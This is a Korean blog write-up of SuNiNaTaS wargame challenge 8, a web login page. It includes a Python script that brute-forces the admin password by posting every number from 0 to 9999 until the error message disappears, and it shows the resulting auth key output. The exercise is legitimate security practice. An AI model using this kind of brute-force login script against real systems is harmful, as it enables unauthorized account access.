URL은 다음과 같다.
http://suninatas.com/challenge/web08/web08.asp
Game 08
suninatas.com
해결책
다음과 같은 로그인 창이 우리를 반겨준다.
늘상 그래 왔듯 코드에 힌트가 있을 것이다. 주석을 보자.
제일 아래부분에 힌트로 다음과 같이 쓰여있다.
- Hint : login 'admin' password in 0~9999
어쩐지 pw필드가 네 자리밖에 안 들어가더라 다음과 같은 Python코드를 작성하자
### 8.py
from requests import *
if __name__=="__main__" :
header = {"User-Agent" :"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36",}
data = {"id":"admin"}
cookie = {"ASP.NET_SessionId" : "자기꺼",
"ASPSESSIONIDCSSBTATD" : "적어",
"auth%5Fkey" : "주세용..."
}
url = "http://suninatas.com/challenge/web08/web08.asp"
for i in range(10000) :
data['pw'] = i
res = post(url,cookies=cookie,data=data,headers=header)
if(res.text.find("Password Incorrect!") == -1 ) :
break
print(res.text)
출력은 다음과 같다.
...
<input type="button" name="btn" value="Login" onclick="submit()" size="20"></td>
</tr>
<tr class="table_main" height="30">
<td colspan="2" align="center" bgcolor="cccccc">Authkey : l3XXXXXXXXXXXXXXX</td>
</tr>
</table>
...
Auth Key를 찾을 수 있다.
'WarGame > SuNiNaTaS' 카테고리의 다른 글
| [SuNiNaTas] 써니나타스 10번 - REVERSING (0) | 2021.06.10 |
|---|---|
| [SuNiNaTas] 써니나타스 9번 - REVERSING (0) | 2021.06.09 |
| [SuNiNaTas] 써니나타스 7번 - WEB (0) | 2021.06.09 |
| [SuNiNaTas] 써니나타스 6번 - WEB (0) | 2021.06.09 |
| [SuNiNaTas] 써니나타스 5번 - WEB (0) | 2021.06.09 |